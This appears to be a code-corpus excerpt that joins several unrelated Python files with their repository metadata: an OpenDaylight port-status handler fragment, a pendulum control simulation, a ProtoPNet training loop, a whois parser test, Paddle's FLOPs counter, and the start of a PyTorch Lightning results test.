if ((operation in [event.OPERATION_UPDATE,
event.OPERATION_CREATE])):
port_id = event.extract_field(path, "neutron:uuid")
port_id = str(port_id).strip("'")
status_field = data.get('status')
if status_field is not None:
status = status_field.get('content')
LOG.debug("Update port for port id %s %s", port_id, status)
# for now we only support transition from DOWN->ACTIVE
# https://bugs.launchpad.net/networking-odl/+bug/1686023
if status == n_const.PORT_STATUS_ACTIVE:
provisioning_blocks.provisioning_complete(
context.get_admin_context(),
port_id, resources.PORT,
provisioning_blocks.L2_AGENT_ENTITY)
if operation == event.OPERATION_DELETE:
LOG.debug("PortStatus: Ignoring delete operation")
def _process_websocket_reconnect(self, status):
if status == odl_ws_client.ODL_WEBSOCKET_CONNECTED:
# Get port data using restconf
LOG.debug("Websocket notification on reconnection")
reconn_thread = threading.Thread(
name='websocket', target=self._pull_missed_statuses)
reconn_thread.start()
def _pull_missed_statuses(self):
LOG.debug("starting to pull pending statuses...")
plugin = directory.get_plugin()
filter = {"status": [n_const.PORT_STATUS_DOWN],
"vif_type": ["unbound"]}
ports = plugin.get_ports(context.get_admin_context(), filter)
if not ports:
LOG.debug("no down ports found, done")
return
port_fetch_url = utils.get_odl_url(self.PORT_PATH)
client = odl_client.OpenDaylightRestClient.create_client(
url=port_fetch_url)
for port in ports:
id = port["id"]
response = client.get(id)
if response.status_code != 200:
LOG.warning("Non-200 response code %s", str(response))
continue
odl_status = response.json()['port'][0]['status']
if odl_status == n_const.PORT_STATUS_ACTIVE:
# for now we only support transition from DOWN->ACTIVE
# See https://bugs.launchpad.net/networking-odl/+bug/1686023
provisioning_blocks.provisioning_complete(
context.get_admin_context(),
id, resources.PORT,
provisioning_blocks.L2_AGENT_ENTITY)
LOG.debug("done pulling pending statuses")
| 40.661765 | 79 | 0.647197 |
77cbf83eb057b9552ea77d2175a56e8593060943
| 6,122 |
py
|
Python
|
examples/inverted_pendulum/simulate.py
|
ashander/opty
|
85f8c5d75c924d393edcbc07324088c3266bca31
|
[
"BSD-2-Clause-FreeBSD"
] | 63 |
2015-03-07T19:38:10.000Z
|
2022-03-31T17:17:53.000Z
|
examples/inverted_pendulum/simulate.py
|
ashander/opty
|
85f8c5d75c924d393edcbc07324088c3266bca31
|
[
"BSD-2-Clause-FreeBSD"
] | 52 |
2015-02-15T17:24:03.000Z
|
2021-06-18T16:43:45.000Z
|
examples/inverted_pendulum/simulate.py
|
ashander/opty
|
85f8c5d75c924d393edcbc07324088c3266bca31
|
[
"BSD-2-Clause-FreeBSD"
] | 22 |
2015-05-25T21:28:16.000Z
|
2022-03-14T03:55:57.000Z
|
#!/usr/bin/env python
# standard lib
from collections import OrderedDict
# external
import numpy as np
from scipy.interpolate import interp1d
from scipy.linalg import solve_continuous_are
from pydy.codegen.ode_function_generators import generate_ode_function
from opty.utils import controllable, sum_of_sines
# local
from model import n_link_pendulum_on_cart
def constants_dict(constants):
"""Returns an ordered dictionary which maps the system constant symbols
to numerical values. The cart spring is set to 10.0 N/m, the cart damper
    to 5.0 Ns/m, gravity is set to 9.81 m/s^2, and the masses and lengths of
    the pendulums are all set to 1.0 to make the pendulum roughly human
    sized."""
return OrderedDict(zip(constants, [10.0, 5.0, 9.81] +
(len(constants) - 1) * [1.0]))
def choose_initial_conditions(typ, x, gains):
free_states = x.T.flatten()
free_gains = gains.flatten()
if typ == 'known':
initial_guess = np.hstack((free_states, free_gains))
elif typ == 'zero':
initial_guess = np.hstack((free_states, 0.1 * np.ones_like(free_gains)))
elif typ == 'ones':
initial_guess = np.hstack((free_states, np.ones_like(free_gains)))
elif typ == 'close':
gain_mod = 0.5 * np.abs(free_gains) * np.random.randn(len(free_gains))
initial_guess = np.hstack((free_states, free_gains + gain_mod))
elif typ == 'random':
initial_guess = np.hstack((x.T.flatten(),
100.0 * np.random.randn(len(free_gains))))
return initial_guess
def input_force(typ, time):
magnitude = 8.0 # Newtons
if typ == 'sine':
lateral_force = magnitude * np.sin(3.0 * 2.0 * np.pi * time)
elif typ == 'random':
lateral_force = 2.0 * magnitude * np.random.random(len(time))
lateral_force -= lateral_force.mean()
elif typ == 'zero':
lateral_force = np.zeros_like(time)
elif typ == 'sumsines':
# I took these frequencies from a sum of sines Ron designed for a
# pilot control problem.
nums = [7, 11, 16, 25, 38, 61, 103, 131, 151, 181, 313, 523]
freq = 2.0 * np.pi * np.array(nums, dtype=float) / 240.0
lateral_force = sum_of_sines(magnitude, freq, time)[0]
else:
raise ValueError('{} is not a valid force type.'.format(typ))
return lateral_force
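# Small illustrative sketch (not part of the original script): a 10 second
# sum-of-sines perturbation sampled at 100 Hz using the helper above.
def _input_force_example():
    time = np.linspace(0.0, 10.0, 1000)
    return input_force('sumsines', time)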
def compute_controller_gains(num_links):
"""Returns a numerical gain matrix that can be multiplied by the error
in the states of the n link pendulum on a cart to generate the joint
torques needed to stabilize the pendulum. The controller follows this
pattern:
u(t) = K * [x_eq - x(t)]
Parameters
----------
    num_links : integer
        The number of links in the pendulum.
Returns
-------
K : ndarray, shape(2, n)
The gains needed to compute joint torques.
"""
res = n_link_pendulum_on_cart(num_links, cart_force=False,
joint_torques=True, spring_damper=True)
mass_matrix = res[0]
forcing_vector = res[1]
constants = res[2]
coordinates = res[3]
speeds = res[4]
specified = res[5]
states = coordinates + speeds
equilibrium_point = np.zeros(len(coordinates) + len(speeds))
equilibrium_dict = dict(zip(states, equilibrium_point))
F_A = forcing_vector.jacobian(states)
F_A = F_A.subs(equilibrium_dict).subs(constants_dict(constants))
F_A = np.array(F_A.tolist(), dtype=float)
F_B = forcing_vector.jacobian(specified)
F_B = F_B.subs(equilibrium_dict).subs(constants_dict(constants))
F_B = np.array(F_B.tolist(), dtype=float)
M = mass_matrix.subs(equilibrium_dict).subs(constants_dict(constants))
M = np.array(M.tolist(), dtype=float)
invM = np.linalg.inv(M)
A = np.dot(invM, F_A)
B = np.dot(invM, F_B)
assert controllable(A, B)
Q = np.eye(len(states))
R = np.eye(len(specified))
S = solve_continuous_are(A, B, Q, R)
K = np.dot(np.dot(np.linalg.inv(R), B.T), S)
return K
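# Hedged sketch (not part of the original script): illustrates the control law
# u(t) = K * [x_eq - x(t)] documented above for a hypothetical two link
# pendulum; the perturbed state below is a made-up value.
def _controller_gain_example():
    K = compute_controller_gains(2)        # one row per joint torque
    equilibrium = np.zeros(K.shape[1])     # upright and at rest
    state = 0.01 * np.ones(K.shape[1])     # small perturbation from upright
    joint_torques = np.dot(K, equilibrium - state)
    return joint_torques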
def closed_loop_ode_func(system, time, set_point, gain_matrix, lateral_force):
"""Returns a function that evaluates the continous closed loop system
first order ODEs.
Parameters
----------
system : tuple, len(6)
The output of the symbolic EoM generator.
time : ndarray, shape(M,)
        The monotonically increasing time values at which the applied lateral
        force is defined.
set_point : ndarray, shape(n,)
The set point for the controller.
gain_matrix : ndarray, shape((n - 1) / 2, n)
The gain matrix that computes the optimal joint torques given the
system state.
lateral_force : ndarray, shape(M,)
The applied lateral force at each time point. This will be linearly
interpolated for time points other than those in time.
Returns
-------
rhs : function
A function that evaluates the right hand side of the first order
ODEs in a form easily used with odeint.
args : dictionary
A dictionary containing the model constant values and the controller
function.
"""
# TODO : It will likely be useful to allow more inputs: noise on the
# equilibrium point (i.e. sensor noise) and noise on the joint torques.
# 10 cycles /sec * 2 pi rad / cycle
interp_func = interp1d(time, lateral_force)
def controller(x, t):
joint_torques = np.dot(gain_matrix, set_point - x)
if t > time[-1]:
lateral_force = interp_func(time[-1])
else:
lateral_force = interp_func(t)
return np.hstack((joint_torques, lateral_force))
mass_matrix = system[0]
forcing = system[1]
constants = system[2]
coordinates = system[3]
speeds = system[4]
specifieds = system[5]
rhs = generate_ode_function(forcing,
coordinates,
speeds,
constants,
mass_matrix=mass_matrix,
specifieds=specifieds,
generator='cython')
args = (controller, constants_dict(constants))
return rhs, args
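# Hedged end-to-end sketch (not part of the original script): the flags passed
# to n_link_pendulum_on_cart, the ordering of the specified inputs, and the
# simulation grid below are assumptions made only for illustration.
def _closed_loop_simulation_example(num_links=1, duration=10.0, fps=60.0):
    from scipy.integrate import odeint
    system = n_link_pendulum_on_cart(num_links, cart_force=True,
                                     joint_torques=True, spring_damper=True)
    time = np.linspace(0.0, duration, int(duration * fps))
    lateral_force = input_force('sumsines', time)
    gains = compute_controller_gains(num_links)
    num_states = gains.shape[1]
    set_point = np.zeros(num_states)       # upright equilibrium, at rest
    rhs, args = closed_loop_ode_func(system, time, set_point, gains,
                                     lateral_force)
    x0 = np.zeros(num_states)
    return odeint(rhs, x0, time, args=args)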
| 31.720207 | 80 | 0.63084 |
81636fbcec24e44944d4e59569cfa3b8194ff0f9
| 11,736 |
py
|
Python
|
train_and_test.py
|
apardyl/ProtoPNet
|
b2bbd7284bfc84a37385c0e975408c68cdf64205
|
[
"MIT"
] | 1 |
2021-03-20T13:57:03.000Z
|
2021-03-20T13:57:03.000Z
|
train_and_test.py
|
apardyl/ProtoPNet
|
b2bbd7284bfc84a37385c0e975408c68cdf64205
|
[
"MIT"
] | null | null | null |
train_and_test.py
|
apardyl/ProtoPNet
|
b2bbd7284bfc84a37385c0e975408c68cdf64205
|
[
"MIT"
] | null | null | null |
from enum import Enum
import numpy as np
import torch
from matplotlib import pyplot as plt
from sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay, roc_auc_score, precision_score, recall_score, \
f1_score, roc_curve
from torch.utils.tensorboard import SummaryWriter
import torch.nn.functional as func
from tqdm import tqdm
from focalloss import FocalLoss
from helpers import list_of_distances
from settings import Settings
from weight_loss import WeightCrossEntropyLoss
class TrainMode(Enum):
WARM = 'warm'
JOINT = 'joint'
PUSH = 'push'
LAST_ONLY = 'last_only'
def _train_or_test(model, dataloader, config: Settings, optimizer=None, use_l1_mask=True,
log_writer: SummaryWriter = None, step: int = 0, weighting_attention=False, is_valid=False):
    '''
    model: the (possibly multi-GPU) ProtoPNet model to run
    dataloader: yields (bag of images, label) pairs, one bag per batch
    optimizer: if None, the pass is evaluation only; otherwise gradients are
        computed and applied with this optimizer
    '''
is_train = optimizer is not None
n_examples = 0
n_correct = 0
n_batches = 0
total_cross_entropy = 0
total_cluster_cost = 0
# separation cost is meaningful only for class_specific
total_separation_cost = 0
total_avg_separation_cost = 0
total_loss = 0
conf_matrix = np.zeros((2, 2), dtype='int32')
preds = []
targets = []
if config.loss_function == 'cross_entropy':
loss_fn = torch.nn.CrossEntropyLoss()
elif config.loss_function == 'focal':
loss_fn = FocalLoss(alpha=0.5, gamma=2)
else:
raise NotImplementedError('unknown loss function: ' + config.loss_function)
with tqdm(total=len(dataloader.dataset), unit='bag') as pbar:
for i, (image, label) in enumerate(dataloader):
input = image.cuda()
            # if the dataloader was built with all_labels=True, label is a list of
            # instance labels; treat the bag as positive if any instance is positive
if len(label) > 1:
label = label.max().unsqueeze(0)
target = label.cuda()
# torch.enable_grad() has no effect outside of no_grad()
grad_req = torch.enable_grad() if is_train else torch.no_grad()
with grad_req:
output, min_distances, attention, _ = model.forward_(input)
cross_entropy = loss_fn(output, target)
if config.mil_pooling == 'loss_attention':
instance_labels = target * torch.ones(input.size(0), dtype=torch.long, device=input.device)
loss_2 = WeightCrossEntropyLoss()(model.out_c, instance_labels, model.A)
cross_entropy += 2.0 * loss_2
if config.class_specific:
max_dist = (model.prototype_shape[1]
* model.prototype_shape[2]
* model.prototype_shape[3])
# prototypes_of_correct_class is a tensor of shape batch_size * num_prototypes
attention_detached = attention.detach().cpu()
weight = np.interp(attention_detached, (attention_detached.min(), attention_detached.max()), (0.001, 1))
if weighting_attention:
tensor_weight = torch.tensor(weight).cuda()
else:
tensor_weight = torch.tensor(1).cuda()
# calculate cluster cost
prototypes_of_correct_class = torch.t(model.prototype_class_identity[:, label]).cuda()
inverted_distances, _ = torch.max(
(max_dist - (min_distances * tensor_weight.T)) * prototypes_of_correct_class, dim=1)
cluster_cost = torch.mean(max_dist - inverted_distances)
# calculate separation cost
prototypes_of_wrong_class = 1 - prototypes_of_correct_class
inverted_distances_to_nontarget_prototypes, _ = \
torch.max((max_dist - (min_distances * tensor_weight.T)) * prototypes_of_wrong_class, dim=1)
separation_cost = torch.mean(max_dist - inverted_distances_to_nontarget_prototypes)
# calculate avg cluster cost
avg_separation_cost = \
torch.sum((min_distances * tensor_weight.T) * prototypes_of_wrong_class, dim=1) / torch.sum(
prototypes_of_wrong_class,
dim=1)
avg_separation_cost = torch.mean(avg_separation_cost)
if use_l1_mask:
l1_mask = 1 - torch.t(model.prototype_class_identity).cuda()
l1 = (model.last_layer.weight * l1_mask).norm(p=1)
else:
l1 = model.last_layer.weight.norm(p=1)
else:
min_distance, _ = torch.min(min_distances, dim=1)
cluster_cost = torch.mean(min_distance)
l1 = model.last_layer.weight.norm(p=1)
# evaluation statistics
_, predicted = torch.max(output.data, 1)
n_examples += target.size(0)
n_correct += (predicted == target).sum().item()
pred_s = func.softmax(output, dim=-1)
preds.append(pred_s.data.cpu().numpy())
targets.append(target.cpu().numpy())
conf_matrix += confusion_matrix(target.cpu().numpy(), predicted.cpu().numpy(), labels=[0, 1])
n_batches += 1
total_cross_entropy += cross_entropy.item()
total_cluster_cost += cluster_cost.item()
total_separation_cost += separation_cost.item()
total_avg_separation_cost += avg_separation_cost.item()
# compute gradient and do SGD step
if config.class_specific:
loss = (config.coef_crs_ent * cross_entropy
+ config.coef_clst * cluster_cost
+ config.coef_sep * separation_cost
+ config.coef_l1 * l1)
else:
loss = (config.coef_crs_ent * cross_entropy
+ config.coef_clst * cluster_cost
+ config.coef_l1 * l1)
total_loss += loss.item()
if is_train:
optimizer.zero_grad()
loss.backward()
# torch.nn.utils.clip_grad_norm_(model.parameters(), 0.5) # gradient clipping
optimizer.step()
del input
del target
del output
del predicted
del min_distances
pbar.update(1)
total_cross_entropy /= n_batches
total_cluster_cost /= n_batches
total_separation_cost /= n_batches
total_loss /= n_batches
preds = np.concatenate(preds)
targets = np.concatenate(targets)
auc = roc_auc_score(targets, preds[..., 1])
pred_y = preds.argmax(1)
precision = precision_score(targets, pred_y, zero_division=0)
recall = recall_score(targets, pred_y, zero_division=0)
f1 = f1_score(targets, pred_y, zero_division=0)
fpr, tpr, threshold = roc_curve(targets, preds[..., 1])
print('\t\taccuracy:', n_correct / n_examples)
print('\t\tauc:', auc)
print('\t\ttotal_loss:', total_loss)
    if is_train:
        suffix = '/train'
    elif is_valid:
        suffix = '/valid'
    else:
        suffix = '/test'
if log_writer:
log_writer.add_scalar('total_loss' + suffix, total_loss, global_step=step)
log_writer.add_scalar('cross_entropy' + suffix, total_cross_entropy, global_step=step)
log_writer.add_scalar('cluster_cost' + suffix, total_cluster_cost, global_step=step)
if config.class_specific:
log_writer.add_scalar('separation_cost' + suffix, total_separation_cost, global_step=step)
log_writer.add_scalar('avg_separation_cost' + suffix, total_avg_separation_cost / n_batches,
global_step=step)
log_writer.add_scalar('accuracy' + suffix, n_correct / n_examples, global_step=step)
log_writer.add_scalar('auc' + suffix, auc, global_step=step)
log_writer.add_scalar('precision' + suffix, precision, global_step=step)
log_writer.add_scalar('recall' + suffix, recall, global_step=step)
log_writer.add_scalar('f-score' + suffix, f1, global_step=step)
log_writer.add_scalar('l1' + suffix, model.last_layer.weight.norm(p=1).item(), global_step=step)
conf_plot = ConfusionMatrixDisplay(confusion_matrix=conf_matrix).plot(cmap='Blues', values_format='d')
log_writer.add_figure('confusion_matrix' + suffix, conf_plot.figure_, global_step=step, close=True)
plt.figure()
plt.title('Receiver Operating Characteristic')
plt.plot(fpr, tpr, 'b', label='AUC = %0.2f' % auc)
plt.legend(loc='lower right')
plt.plot([0, 1], [0, 1], 'r--')
plt.xlim([0, 1])
plt.ylim([0, 1])
plt.ylabel('True Positive Rate')
plt.xlabel('False Positive Rate')
log_writer.add_figure('roc' + suffix, plt.gcf(), global_step=step, close=True)
p = model.prototype_vectors.view(model.num_prototypes, -1).cpu()
with torch.no_grad():
p_avg_pair_dist = torch.mean(list_of_distances(p, p))
if log_writer:
log_writer.add_scalar('p_avg_pair_dist' + suffix, p_avg_pair_dist, global_step=step)
return auc
def train(model, dataloader, optimizer, config: Settings, log_writer: SummaryWriter = None,
step: int = 0, weighting_attention=False):
assert (optimizer is not None)
print('\ttrain')
model.train()
return _train_or_test(model=model, dataloader=dataloader, config=config, optimizer=optimizer,
log_writer=log_writer, step=step, weighting_attention=weighting_attention)
def valid(model, dataloader, config: Settings, log_writer: SummaryWriter = None, step: int = 0,
weighting_attention=False):
print('\tvalid')
model.eval()
return _train_or_test(model=model, dataloader=dataloader, config=config, optimizer=None,
log_writer=log_writer, step=step, weighting_attention=weighting_attention, is_valid=True)
def test(model, dataloader, config: Settings, log_writer: SummaryWriter = None, step: int = 0,
weighting_attention=False):
print('\ttest')
model.eval()
return _train_or_test(model=model, dataloader=dataloader, config=config, optimizer=None,
log_writer=log_writer, step=step, weighting_attention=weighting_attention)
def _freeze_layer(layer):
for p in layer.parameters():
p.requires_grad = False
def _unfreeze_layer(layer):
for p in layer.parameters():
p.requires_grad = True
def last_only(model):
_freeze_layer(model.features)
_freeze_layer(model.add_on_layers)
model.prototype_vectors.requires_grad = False
_unfreeze_layer(model.attention_V)
_unfreeze_layer(model.attention_U)
_unfreeze_layer(model.attention_weights)
_unfreeze_layer(model.last_layer)
def warm_only(model):
_unfreeze_layer(model.features)
_unfreeze_layer(model.add_on_layers)
_unfreeze_layer(model.attention_V)
_unfreeze_layer(model.attention_U)
_unfreeze_layer(model.attention_weights)
model.prototype_vectors.requires_grad = True
_unfreeze_layer(model.last_layer)
def joint(model):
_unfreeze_layer(model.features)
_unfreeze_layer(model.add_on_layers)
model.prototype_vectors.requires_grad = True
_freeze_layer(model.attention_V)
_freeze_layer(model.attention_U)
_freeze_layer(model.attention_weights)
_freeze_layer(model.last_layer)
| 39.250836 | 124 | 0.628323 |
e7e9e8e05037a0d368709d20745c3d3e79794f66
| 933 |
py
|
Python
|
test/record/parser/test_response_whois_jprs_jp_jp_property_status_suspended.py
|
huyphan/pyyawhois
|
77fb2f73a9c67989f1d41d98f37037406a69d136
|
[
"MIT"
] | null | null | null |
test/record/parser/test_response_whois_jprs_jp_jp_property_status_suspended.py
|
huyphan/pyyawhois
|
77fb2f73a9c67989f1d41d98f37037406a69d136
|
[
"MIT"
] | null | null | null |
test/record/parser/test_response_whois_jprs_jp_jp_property_status_suspended.py
|
huyphan/pyyawhois
|
77fb2f73a9c67989f1d41d98f37037406a69d136
|
[
"MIT"
] | null | null | null |
# This file is autogenerated. Do not edit it manually.
# If you want to change the content of this file, edit
#
# spec/fixtures/responses/whois.jprs.jp/jp/property_status_suspended
#
# and regenerate the tests with the following script
#
# $ scripts/generate_tests.py
#
from nose.tools import *
from dateutil.parser import parse as time_parse
import yawhois
class TestWhoisJprsJpJpPropertyStatusSuspended(object):
def setUp(self):
fixture_path = "spec/fixtures/responses/whois.jprs.jp/jp/property_status_suspended.txt"
host = "whois.jprs.jp"
part = yawhois.record.Part(open(fixture_path, "r").read(), host)
self.record = yawhois.record.Record(None, [part])
def test_status(self):
eq_(self.record.status, 'expired')
def test_available(self):
eq_(self.record.available, False)
def test_registered(self):
eq_(self.record.registered, True)
| 29.15625 | 95 | 0.702036 |
2c59ee67d4a8e9ae49bf7eadec2d1b1e9d1e7fce
| 10,349 |
py
|
Python
|
python/paddle/hapi/dynamic_flops.py
|
wwqgtxx/Paddle
|
109ca9d250e37e723e364366e8402c307b110169
|
[
"Apache-2.0"
] | 17,085 |
2016-11-18T06:40:52.000Z
|
2022-03-31T22:52:32.000Z
|
python/paddle/hapi/dynamic_flops.py
|
betterpig/paddle_npu
|
74ad4b6a700795d5edce8dd49d6c2df6f15e8935
|
[
"Apache-2.0"
] | 29,769 |
2016-11-18T06:35:22.000Z
|
2022-03-31T16:46:15.000Z
|
python/paddle/hapi/dynamic_flops.py
|
betterpig/paddle_npu
|
74ad4b6a700795d5edce8dd49d6c2df6f15e8935
|
[
"Apache-2.0"
] | 4,641 |
2016-11-18T07:43:33.000Z
|
2022-03-31T15:15:02.000Z
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import warnings
import paddle.nn as nn
import numpy as np
from .static_flops import static_flops, Table
__all__ = []
def flops(net, input_size, custom_ops=None, print_detail=False):
"""Print a table about the FLOPs of network.
Args:
net (paddle.nn.Layer||paddle.static.Program): The network which could be a instance of paddle.nn.Layer in
dygraph or paddle.static.Program in static graph.
input_size (list): size of input tensor. Note that the batch_size in argument 'input_size' only support 1.
custom_ops (A dict of function, optional): A dictionary which key is the class of specific operation such as
paddle.nn.Conv2D and the value is the function used to count the FLOPs of this operation. This
argument only work when argument 'net' is an instance of paddle.nn.Layer. The details could be found
in following example code. Default is None.
print_detail (bool, optional): Whether to print the detail information, like FLOPs per layer, about the net FLOPs.
Default is False.
Returns:
        Int: The total FLOPs of the network.
Examples:
.. code-block:: python
import paddle
import paddle.nn as nn
class LeNet(nn.Layer):
def __init__(self, num_classes=10):
super(LeNet, self).__init__()
self.num_classes = num_classes
self.features = nn.Sequential(
nn.Conv2D(
1, 6, 3, stride=1, padding=1),
nn.ReLU(),
nn.MaxPool2D(2, 2),
nn.Conv2D(
6, 16, 5, stride=1, padding=0),
nn.ReLU(),
nn.MaxPool2D(2, 2))
if num_classes > 0:
self.fc = nn.Sequential(
nn.Linear(400, 120),
nn.Linear(120, 84),
nn.Linear(
84, 10))
def forward(self, inputs):
x = self.features(inputs)
if self.num_classes > 0:
x = paddle.flatten(x, 1)
x = self.fc(x)
return x
lenet = LeNet()
            # m is the instance of nn.Layer, x is the input of the layer, y is the output of the layer.
def count_leaky_relu(m, x, y):
x = x[0]
nelements = x.numel()
m.total_ops += int(nelements)
FLOPs = paddle.flops(lenet, [1, 1, 28, 28], custom_ops= {nn.LeakyReLU: count_leaky_relu},
print_detail=True)
print(FLOPs)
#+--------------+-----------------+-----------------+--------+--------+
#| Layer Name | Input Shape | Output Shape | Params | Flops |
#+--------------+-----------------+-----------------+--------+--------+
#| conv2d_2 | [1, 1, 28, 28] | [1, 6, 28, 28] | 60 | 47040 |
#| re_lu_2 | [1, 6, 28, 28] | [1, 6, 28, 28] | 0 | 0 |
#| max_pool2d_2 | [1, 6, 28, 28] | [1, 6, 14, 14] | 0 | 0 |
#| conv2d_3 | [1, 6, 14, 14] | [1, 16, 10, 10] | 2416 | 241600 |
#| re_lu_3 | [1, 16, 10, 10] | [1, 16, 10, 10] | 0 | 0 |
#| max_pool2d_3 | [1, 16, 10, 10] | [1, 16, 5, 5] | 0 | 0 |
#| linear_0 | [1, 400] | [1, 120] | 48120 | 48000 |
#| linear_1 | [1, 120] | [1, 84] | 10164 | 10080 |
#| linear_2 | [1, 84] | [1, 10] | 850 | 840 |
#+--------------+-----------------+-----------------+--------+--------+
#Total Flops: 347560 Total Params: 61610
"""
if isinstance(net, nn.Layer):
inputs = paddle.randn(input_size)
return dynamic_flops(
net,
inputs=inputs,
custom_ops=custom_ops,
print_detail=print_detail)
elif isinstance(net, paddle.static.Program):
return static_flops(net, print_detail=print_detail)
else:
warnings.warn(
"Your model must be an instance of paddle.nn.Layer or paddle.static.Program."
)
return -1
def count_convNd(m, x, y):
x = x[0]
kernel_ops = np.product(m.weight.shape[2:])
bias_ops = 1 if m.bias is not None else 0
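    # ops counted per output element: (in_channels / groups) * prod(kernel spatial dims),
    # plus one op for the bias if present; scaled by the number of output elements below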
total_ops = int(y.numel()) * (
x.shape[1] / m._groups * kernel_ops + bias_ops)
m.total_ops += abs(int(total_ops))
def count_leaky_relu(m, x, y):
x = x[0]
nelements = x.numel()
m.total_ops += int(nelements)
def count_bn(m, x, y):
x = x[0]
nelements = x.numel()
if not m.training:
total_ops = 2 * nelements
m.total_ops += abs(int(total_ops))
def count_linear(m, x, y):
total_mul = m.weight.shape[0]
num_elements = y.numel()
total_ops = total_mul * num_elements
m.total_ops += abs(int(total_ops))
def count_avgpool(m, x, y):
kernel_ops = 1
num_elements = y.numel()
total_ops = kernel_ops * num_elements
m.total_ops += int(total_ops)
def count_adap_avgpool(m, x, y):
kernel = np.array(x[0].shape[2:]) // np.array(y.shape[2:])
total_add = np.product(kernel)
total_div = 1
kernel_ops = total_add + total_div
num_elements = y.numel()
total_ops = kernel_ops * num_elements
m.total_ops += abs(int(total_ops))
def count_zero_ops(m, x, y):
m.total_ops += int(0)
def count_parameters(m, x, y):
total_params = 0
for p in m.parameters():
total_params += p.numel()
m.total_params[0] = abs(int(total_params))
def count_io_info(m, x, y):
m.register_buffer('input_shape', paddle.to_tensor(x[0].shape))
m.register_buffer('output_shape', paddle.to_tensor(y.shape))
register_hooks = {
nn.Conv1D: count_convNd,
nn.Conv2D: count_convNd,
nn.Conv3D: count_convNd,
nn.Conv1DTranspose: count_convNd,
nn.Conv2DTranspose: count_convNd,
nn.Conv3DTranspose: count_convNd,
nn.layer.norm.BatchNorm2D: count_bn,
nn.BatchNorm: count_bn,
nn.ReLU: count_zero_ops,
nn.ReLU6: count_zero_ops,
nn.LeakyReLU: count_leaky_relu,
nn.Linear: count_linear,
nn.Dropout: count_zero_ops,
nn.AvgPool1D: count_avgpool,
nn.AvgPool2D: count_avgpool,
nn.AvgPool3D: count_avgpool,
nn.AdaptiveAvgPool1D: count_adap_avgpool,
nn.AdaptiveAvgPool2D: count_adap_avgpool,
nn.AdaptiveAvgPool3D: count_adap_avgpool
}
def dynamic_flops(model, inputs, custom_ops=None, print_detail=False):
handler_collection = []
types_collection = set()
if custom_ops is None:
custom_ops = {}
def add_hooks(m):
if len(list(m.children())) > 0:
return
m.register_buffer('total_ops', paddle.zeros([1], dtype='int64'))
m.register_buffer('total_params', paddle.zeros([1], dtype='int64'))
m_type = type(m)
flops_fn = None
if m_type in custom_ops:
flops_fn = custom_ops[m_type]
if m_type not in types_collection:
print("Customize Function has been applied to {}".format(
m_type))
elif m_type in register_hooks:
flops_fn = register_hooks[m_type]
if m_type not in types_collection:
print("{}'s flops has been counted".format(m_type))
else:
if m_type not in types_collection:
print(
"Cannot find suitable count function for {}. Treat it as zero FLOPs.".
format(m_type))
if flops_fn is not None:
flops_handler = m.register_forward_post_hook(flops_fn)
handler_collection.append(flops_handler)
params_handler = m.register_forward_post_hook(count_parameters)
io_handler = m.register_forward_post_hook(count_io_info)
handler_collection.append(params_handler)
handler_collection.append(io_handler)
types_collection.add(m_type)
training = model.training
model.eval()
model.apply(add_hooks)
with paddle.framework.no_grad():
model(inputs)
total_ops = 0
total_params = 0
for m in model.sublayers():
if len(list(m.children())) > 0:
continue
if set(['total_ops', 'total_params', 'input_shape',
'output_shape']).issubset(set(list(m._buffers.keys()))):
total_ops += m.total_ops
total_params += m.total_params
if training:
model.train()
for handler in handler_collection:
handler.remove()
table = Table(
["Layer Name", "Input Shape", "Output Shape", "Params", "Flops"])
for n, m in model.named_sublayers():
if len(list(m.children())) > 0:
continue
if set(['total_ops', 'total_params', 'input_shape',
'output_shape']).issubset(set(list(m._buffers.keys()))):
table.add_row([
m.full_name(), list(m.input_shape.numpy()),
list(m.output_shape.numpy()), int(m.total_params),
int(m.total_ops)
])
m._buffers.pop("total_ops")
m._buffers.pop("total_params")
m._buffers.pop('input_shape')
m._buffers.pop('output_shape')
if print_detail:
table.print_table()
print('Total Flops: {} Total Params: {}'.format(
int(total_ops), int(total_params)))
return int(total_ops)
| 35.934028 | 122 | 0.555996 |
5e091d2b5ed8ce4184e6fcd07c64e73d85976f17
| 5,313 |
py
|
Python
|
tests/core/test_results.py
|
ameliatqy/pytorch-lightning
|
ca18e11f6efe822098c79e7d9124b08a55bcd908
|
[
"Apache-2.0"
] | null | null | null |
tests/core/test_results.py
|
ameliatqy/pytorch-lightning
|
ca18e11f6efe822098c79e7d9124b08a55bcd908
|
[
"Apache-2.0"
] | null | null | null |
tests/core/test_results.py
|
ameliatqy/pytorch-lightning
|
ca18e11f6efe822098c79e7d9124b08a55bcd908
|
[
"Apache-2.0"
] | null | null | null |
import sys
from pathlib import Path
import pytest
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
from pytorch_lightning import Trainer, seed_everything
from pytorch_lightning.core.step_result import Result, TrainResult, EvalResult
import tests.base.develop_utils as tutils
from tests.base import EvalModelTemplate
from tests.base.datamodules import TrialMNISTDataModule
def _setup_ddp(rank, worldsize):
import os
os.environ["MASTER_ADDR"] = "localhost"
# initialize the process group
dist.init_process_group("gloo", rank=rank, world_size=worldsize)
def _ddp_test_fn(rank, worldsize, result_cls: Result):
_setup_ddp(rank, worldsize)
tensor = torch.tensor([1.0])
res = result_cls()
res.log("test_tensor", tensor, sync_dist=True, sync_dist_op=torch.distributed.ReduceOp.SUM)
assert res["test_tensor"].item() == dist.get_world_size(), "Result-Log does not work properly with DDP and Tensors"
@pytest.mark.parametrize("result_cls", [Result, TrainResult, EvalResult])
@pytest.mark.skipif(sys.platform == "win32", reason="DDP not available on windows")
def test_result_reduce_ddp(result_cls):
"""Make sure result logging works with DDP"""
tutils.reset_seed()
tutils.set_random_master_port()
worldsize = 2
mp.spawn(_ddp_test_fn, args=(worldsize, result_cls), nprocs=worldsize)
@pytest.mark.parametrize(
"test_option,do_train,gpus",
[
pytest.param(
0, True, 0, id='full_loop'
),
pytest.param(
0, False, 0, id='test_only'
),
pytest.param(
1, False, 0, id='test_only_mismatching_tensor', marks=pytest.mark.xfail(raises=ValueError, match="Mism.*")
),
pytest.param(
